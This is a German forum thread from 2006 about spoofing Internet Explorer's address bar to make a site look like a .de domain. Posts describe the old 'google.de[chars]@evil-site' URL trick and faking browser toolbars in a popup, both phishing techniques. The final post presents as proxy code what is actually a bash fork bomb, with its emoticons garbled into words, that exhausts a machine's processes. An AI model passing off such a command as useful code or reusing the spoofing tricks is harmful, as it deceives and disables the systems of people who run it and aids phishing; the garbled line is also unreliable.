Webstatt.org - Community seit 2006 - 2012 (2024?)

Lücke im IE

user-137
23.06.2006 13:33

Hallo,

habe gehört das mann durch eine Lücke im IE die Adresszeile ändern kann, weiß einer wie das geht, würde es gerne bei mir machen damit es wie ne DE Seite aussieht!
Solange ich keinen echten Daimend habe..

Avatar user-253
23.06.2006 14:51

Das geht so weit ich weiss eh nicht mehr.
Wenn du dir eine .de Adresse registrierst dauerts nur ein paar Tage... die kannst du wohl warten

Avatar user-300
23.06.2006 14:52

Ausserdem würden wahrscheinlich viele Antiviren Programme und/oder Firewalls deine Seite blocken. zwinkern

user-137
23.06.2006 15:22

Also ich habe ihn noch nicht Registriert, weil ich noch nicht genug geld habe!

Avatar user-290
23.06.2006 15:26

Kannst nur die Adresszeile auslesen. Könnte man sie ändern, wär das ein ziemlich heftiger Bug...Dadurch hätten Phisher ja noch effektivere Methoden an Passwörter zu kommen.

user-137
23.06.2006 15:28

Deshalb kam ich auf die idee, das man seine Seite als .de Daimand ausgeben kann...

user-303
23.06.2006 15:33

Original von user-290
Kannst nur die Adresszeile auslesen. Könnte man sie ändern, wär das ein ziemlich heftiger Bug...Dadurch hätten Phisher ja noch effektivere Methoden an Passwörter zu kommen.

das hat aber wirklich mal funktioniert.
ich weis leider nicht mehr genau, welches zeichen das war. aber stells dir so vor:

http://www.google.de[diese zeichen]@boeseseite.de

und schon stand google.de in der adresszeile...

Avatar user-290
23.06.2006 15:43

na zum Glück nicht mehr lächeln
Man könnte ja auch rein theoretisch ein Popup erstellen und die Symbolleisten deaktivieren und mit HTML und Grafiken diese "imitieren". user-158n könnte man auch eine eigene Adresszeile da oben erstellen :rolleyes: naja...

Avatar user-271
23.06.2006 17:33

schreibt doch einfach einen Proxy zwinkern der einfach einen Browser imitiert *Fg* hab hier anfänge rumliegen...unterstützt sogar tabbing imo Fettes Grinsen

#!/bin/bash
traurig){ neutral:& };: